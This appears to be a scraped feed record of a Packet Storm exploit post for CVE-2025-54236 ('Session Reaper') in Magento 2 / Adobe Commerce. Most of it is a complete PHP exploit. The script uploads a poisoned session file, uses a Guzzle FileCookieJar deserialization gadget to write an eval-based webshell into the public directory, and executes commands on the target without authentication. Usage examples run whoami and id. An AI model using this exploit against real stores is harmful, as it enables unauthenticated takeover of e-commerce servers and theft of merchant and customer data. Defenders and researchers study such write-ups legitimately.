{“lastseen”:”2025-12-24T16:34:07″,”description”:”This flaw in Magento 2 \/ Adobe Commerce 2.4.x enables remote attackers to manipulate internal session handling paths and abuse PHP object chains Guzzle FileCookieJar gadget to achieve arbitrary file write, leading to remote code execution…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Adobe Commerce Insecure Deserialization”,”source”:””,”references”:””,”id”:”PACKETSTORM:213296″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-54236″],”sourceData”:”=============================================================================================================================================\\n | # Title : Magento 2 \/ Adobe Commerce Multiple 2.4.x builds Session Reaper Deserialization Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/community.magento.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212729\/ \\u0026 CVE\u20112025\u201154236\\n \\n [+] Summary : CVE\u20112025\u201154236 is a critical unauthenticated deserialization vulnerability affecting Adobe Commerce (Magento).\\n The flaw enables remote attackers to manipulate internal session handling paths and abuse PHP object chains (Guzzle FileCookieJar gadget) \\n \\t\\t\\t\\t to achieve arbitrary file write, leading to Remote Code Execution (RCE).\\n \\n A public exploit known informally as \u201cMagento Session Reaper\u201d chains multiple weaknesses together:\\n \\n Session file poisoning\\n \\n JSON API injection\\n \\n Object deserialization gadgets\\n \\n Guzzle FileCookieJar file\u2011write primitive\\n \\n Forced session deserialization\\n \\n WebShell deployment\\n \\n The attack requires no valid session, no authentication, and no user interaction.\\n \\n [+] POC :\\n \\n # Verification only\\n \\n php poc.php https:\/\/target.com\\n \\n # Execution with command\\n \\n php poc.php https:\/\/target.com \\”whoami\\”\\n \\n # Execution with shell code\\n \\n php poc.php https:\/\/target.com \\”\\u003c?php system(‘id’); ?\\u003e\\”\\n \\n \\n \\u003c?php\\n \\n class MagentoSessionReaperExploit {\\n private $targetUrl;\\n private $sessionId;\\n private $sessionFilename;\\n private $exploitFilename;\\n private $postParam;\\n \\n public function __construct($targetUrl) {\\n $this-\\u003etargetUrl = rtrim($targetUrl, ‘\/’);\\n $this-\\u003esessionId = bin2hex(random_bytes(16));\\n $this-\\u003esessionFilename = \\”sess_{$this-\\u003esessionId}\\”;\\n $this-\\u003eexploitFilename = bin2hex(random_bytes(4)) . \\”.php\\”;\\n $this-\\u003epostParam = bin2hex(random_bytes(4));\\n }\\n \\n \/**\\n * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629\\n *\/\\n public function check() {\\n $randomPath = implode(‘\/’, [\\n bin2hex(random_bytes(4)),\\n bin2hex(random_bytes(4)),\\n bin2hex(random_bytes(4))\\n ]);\\n \\n $cartId = bin2hex(random_bytes(4));\\n $url = \\”{$this-\\u003etargetUrl}\/rest\/default\/V1\/guest-carts\/{$cartId}\/order\\”;\\n \\n $payload = $this-\\u003ebuildDeserializationPayload($randomPath);\\n \\n $response = $this-\\u003esendRequest($url, ‘PUT’, $payload, [\\n ‘Content-Type: application\/json’,\\n ‘Accept: application\/json’\\n ]);\\n \\n if (!$response) {\\n return \\”Unknown: No response from target\\”;\\n }\\n \\n $statusCode = $response[‘status_code’];\\n $body = strtolower($response[‘body’]);\\n \\n switch ($statusCode) {\\n case 400:\\n return \\”Safe: Target is patched (returns 400 Bad Request)\\”;\\n case 404:\\n if (strpos($body, ‘no such entity’) !== false \\u0026\\u0026\\n (strpos($body, ‘cartid’) !== false || \\n (strpos($body, ‘fieldname’) !== false \\u0026\\u0026 strpos($body, ‘fieldvalue’) !== false))) {\\n return \\”Appears: Target returned 404 with expected error pattern\\”;\\n }\\n break;\\n case 500:\\n if (strpos($body, ‘sessionhandler::read’) !== false ||\\n (strpos($body, ‘no such file or directory’) !== false \\u0026\\u0026 strpos($body, ‘session’) !== false) ||\\n strpos($body, ‘webapi-‘) !== false) {\\n return \\”Appears: Target returned 500 error with SessionHandler\\”;\\n }\\n break;\\n }\\n \\n return \\”Unknown: Unexpected HTTP status: {$statusCode}\\”;\\n }\\n \\n \/**\\n * \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n *\/\\n public function exploit($command = null) {\\n echo \\”[*] Generating Guzzle\/FW1 deserialization payload…\\\\n\\”;\\n \\n $phpStub = \\”\\u003c?php @eval(base64_decode(\\\\$_POST[‘{$this-\\u003epostParam}’]));?\\u003e\\”;\\n $guzzlePayload = $this-\\u003ebuildGuzzleFw1Payload(\\”pub\/{$this-\\u003eexploitFilename}\\”, $phpStub);\\n \\n echo \\”[*] Uploading session file with Guzzle payload…\\\\n\\”;\\n $formKey = bin2hex(random_bytes(6));\\n $uploadedPath = $this-\\u003euploadSessionFile($guzzlePayload, $formKey);\\n \\n if (!$uploadedPath) {\\n echo \\”[-] Failed to upload session file\\\\n\\”;\\n return false;\\n }\\n \\n $savePath = \\”media\/customer_address\\” . dirname($uploadedPath);\\n \\n echo \\”[*] Triggering deserialization…\\\\n\\”;\\n if (!$this-\\u003etriggerDeserialization($savePath)) {\\n echo \\”[-] Failed to trigger deserialization\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[+] Deserialization triggered successfully\\\\n\\”;\\n \\n \/\/ \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0645\u0624\u0642\u062a\u0629\\n $this-\\u003ecleanup();\\n \\n $executeUrl = \\”{$this-\\u003etargetUrl}\/pub\/{$this-\\u003eexploitFilename}\\”;\\n echo \\”[*] Executing payload at: {$executeUrl}\\\\n\\”;\\n \\n if ($command) {\\n $encodedCommand = base64_encode($command);\\n $this-\\u003esendRequest($executeUrl, ‘POST’, \\”{$this-\\u003epostParam}=\\” . urlencode($encodedCommand), [\\n ‘Content-Type: application\/x-www-form-urlencoded’\\n ]);\\n }\\n \\n return true;\\n }\\n \\n \/**\\n * \u0631\u0641\u0639 \u0645\u0644\u0641 \u0627\u0644\u062c\u0644\u0633\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629\\n *\/\\n private function uploadSessionFile($content, $formKey) {\\n $boundary = ‘—-‘ . bin2hex(random_bytes(16));\\n $filename = \\”sess_{$this-\\u003esessionId}\\”;\\n \\n $postData = \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data; name=\\\\\\”form_key\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .= \\”{$formKey}\\\\r\\\\n\\”;\\n \\n $postData .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $postData .= \\”Content-Disposition: form-data; name=\\\\\\”custom_attributes[country_id]\\\\\\”; filename=\\\\\\”{$filename}\\\\\\”\\\\r\\\\n\\”;\\n $postData .= \\”Content-Type: application\/octet-stream\\\\r\\\\n\\\\r\\\\n\\”;\\n $postData .= \\”{$content}\\\\r\\\\n\\”;\\n $postData .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $url = \\”{$this-\\u003etargetUrl}\/customer\/address_file\/upload\\”;\\n \\n $response = $this-\\u003esendRequest($url, ‘POST’, $postData, [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”Cookie: form_key={$formKey}\\”\\n ]);\\n \\n if (!$response || $response[‘status_code’] != 200) {\\n return null;\\n }\\n \\n $jsonResponse = json_decode($response[‘body’], true);\\n \\n if (isset($jsonResponse[‘error’]) \\u0026\\u0026 $jsonResponse[‘error’] != 0) {\\n echo \\”[-] Upload failed: {$jsonResponse[‘error’]}\\\\n\\”;\\n return null;\\n }\\n \\n if (isset($jsonResponse[‘file’])) {\\n return $jsonResponse[‘file’];\\n }\\n \\n $sessionSaveDir = $this-\\u003esessionSaveDirFromFilename($filename);\\n return \\”\/{$sessionSaveDir}\/{$filename}\\”;\\n }\\n \\n \/**\\n * \u0628\u0646\u0627\u0621 payload \u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0633\u0644\u0633\u0644\\n *\/\\n private function buildDeserializationPayload($savePath) {\\n $payload = [\\n ‘paymentMethod’ =\\u003e [\\n ‘paymentData’ =\\u003e [\\n ‘context’ =\\u003e [\\n ‘urlBuilder’ =\\u003e [\\n ‘session’ =\\u003e [\\n ‘sessionConfig’ =\\u003e [\\n ‘savePath’ =\\u003e $savePath\\n ]\\n ]\\n ]\\n ]\\n ]\\n ]\\n ];\\n \\n return json_encode($payload);\\n }\\n \\n \/**\\n * \u062a\u0641\u0639\u064a\u0644 \u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0633\u0644\u0633\u0644\\n *\/\\n private function triggerDeserialization($savePath) {\\n $cartId = bin2hex(random_bytes(4));\\n $url = \\”{$this-\\u003etargetUrl}\/rest\/default\/V1\/guest-carts\/{$cartId}\/order\\”;\\n \\n $payload = $this-\\u003ebuildDeserializationPayload($savePath);\\n \\n $response = $this-\\u003esendRequest($url, ‘PUT’, $payload, [\\n ‘Content-Type: application\/json’,\\n ‘Accept: application\/json’,\\n \\”Cookie: PHPSESSID={$this-\\u003esessionId}\\”\\n ]);\\n \\n if (!$response) {\\n return false;\\n }\\n \\n return in_array($response[‘status_code’], [404, 500]);\\n }\\n \\n \/**\\n * \u0628\u0646\u0627\u0621 payload Guzzle\/FW1\\n *\/\\n private function buildGuzzleFw1Payload($targetFile, $phpContent) {\\n $escaped = \\”{$phpContent}\\\\n\\”;\\n \\n \/\/ Serialize string with PHP binary-safe format\\n $setCookieData = \\”a:3:{\\” . \\n $this-\\u003eserializeStringAscii(‘Expires’) . \\”i:1;\\” .\\n $this-\\u003eserializeStringAscii(‘Discard’) . \\”b:0;\\” .\\n $this-\\u003eserializeStringAscii(‘Value’) . $this-\\u003eserializeStringAscii($escaped) . \\n \\”}\\”;\\n \\n $setCookie = ‘O:27:\\”GuzzleHttp\\\\\\\\Cookie\\\\\\\\SetCookie\\”:1:’ .\\n \\”{\\” . $this-\\u003eserializeStringAscii(‘data’) . \\”{$setCookieData}}\\”;\\n \\n $cookiesArray = \\”a:1:{i:0;{$setCookie}}\\”;\\n \\n $fileCookieJar = ‘O:31:\\”GuzzleHttp\\\\\\\\Cookie\\\\\\\\FileCookieJar\\”:4:’ .\\n \\”{\\” . $this-\\u003eserializeStringAscii(‘cookies’) . \\”{$cookiesArray}\\” .\\n $this-\\u003eserializeStringAscii(‘strictMode’) . \\”N;\\” .\\n $this-\\u003eserializeStringAscii(‘filename’) . $this-\\u003eserializeStringAscii($targetFile) .\\n $this-\\u003eserializeStringAscii(‘storeSessionCookies’) . \\”b:1;}\\”;\\n \\n return \\”_|{$fileCookieJar}\\”;\\n }\\n \\n \/**\\n * \u062a\u0633\u0644\u0633\u0644 \u0646\u0635 \u0628\u0635\u064a\u063a\u0629 ASCII \u062b\u0646\u0627\u0626\u064a\u0629 \u0622\u0645\u0646\u0629 \u0644\u0640 PHP\\n *\/\\n private function serializeStringAscii($str) {\\n $result = ”;\\n $length = strlen($str);\\n \\n for ($i = 0; $i \\u003c $length; $i++) {\\n $byte = ord($str[$i]);\\n \\n \/\/ Keep printable ASCII characters except backslash (92) and double quote (34)\\n if ($byte \\u003e= 32 \\u0026\\u0026 $byte \\u003c= 126 \\u0026\\u0026 $byte != 92 \\u0026\\u0026 $byte != 34) {\\n $result .= chr($byte);\\n } else {\\n \/\/ Escape other characters as \\\\xHH\\n $result .= sprintf(\\”\\\\\\\\x%02x\\”, $byte);\\n }\\n }\\n \\n return \\”S:{$length}:\\\\\\”{$result}\\\\\\”;\\”;\\n }\\n \\n \/**\\n * \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0633\u0627\u0631 \u062d\u0641\u0638 \u0627\u0644\u062c\u0644\u0633\u0629 \u0645\u0646 \u0627\u0633\u0645 \u0627\u0644\u0645\u0644\u0641\\n *\/\\n private function sessionSaveDirFromFilename($filename) {\\n return $filename[0] . ‘\/’ . $filename[1];\\n }\\n \\n \/**\\n * \u0625\u0631\u0633\u0627\u0644 \u0637\u0644\u0628 HTTP\\n *\/\\n private function sendRequest($url, $method, $data = null, $headers = []) {\\n $ch = curl_init();\\n \\n curl_setopt($ch, CURLOPT_URL, $url);\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n curl_setopt($ch, CURLOPT_TIMEOUT, 30);\\n \\n if ($method === ‘POST’ || $method === ‘PUT’) {\\n curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n }\\n \\n if (!empty($headers)) {\\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n }\\n \\n $response = curl_exec($ch);\\n $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n \\n curl_close($ch);\\n \\n if ($error) {\\n echo \\”[-] cURL Error: {$error}\\\\n\\”;\\n return null;\\n }\\n \\n return [\\n ‘status_code’ =\\u003e $statusCode,\\n ‘body’ =\\u003e $response\\n ];\\n }\\n \\n \/**\\n * \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0645\u0624\u0642\u062a\u0629\\n *\/\\n private function cleanup() {\\n \/\/ \u064a\u0645\u0643\u0646 \u0625\u0636\u0627\u0641\u0629 \u0645\u0646\u0637\u0642 \u0627\u0644\u062a\u0646\u0638\u064a\u0641 \u0647\u0646\u0627\\n \/\/ \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u060c \u064a\u062c\u0628 \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0645 \u0625\u0646\u0634\u0627\u0624\u0647\u0627\\n }\\n }\\n \\n \/\/ \u0645\u062b\u0627\u0644 \u0644\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”Magento SessionReaper Exploit by indoushka\\\\n\\”;\\n echo \\”=============================================\\\\n\\\\n\\”;\\n \\n if ($argc \\u003c 2) {\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” \\u003ctarget_url\\u003e [command]\\\\n\\”;\\n echo \\”Example: php \\” . basename(__FILE__) . \\” https:\/\/target.com \\\\\\”whoami\\\\\\”\\\\n\\”;\\n exit(1);\\n }\\n \\n $targetUrl = $argv[1];\\n $command = $argc \\u003e 2 ? $argv[2] : null;\\n \\n $exploit = new MagentoSessionReaperExploit($targetUrl);\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0623\u0648\u0644\u0627\u064b\\n echo \\”[*] Checking target…\\\\n\\”;\\n $checkResult = $exploit-\\u003echeck();\\n echo \\”[*] Check result: {$checkResult}\\\\n\\”;\\n \\n if (strpos($checkResult, ‘Appears’) !== false || strpos($checkResult, ‘Unknown’) !== false) {\\n echo \\”[*] Attempting exploitation…\\\\n\\”;\\n if ($exploit-\\u003eexploit($command)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] Target appears to be safe or patched\\\\n\\”;\\n }\\n }\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213296″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213296\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-24T16:34:07″,”description”:”This flaw in Magento 2 \/ Adobe Commerce 2.4.x enables remote attackers to manipulate internal session handling paths and abuse PHP object chains Guzzle FileCookieJar…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-32695","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n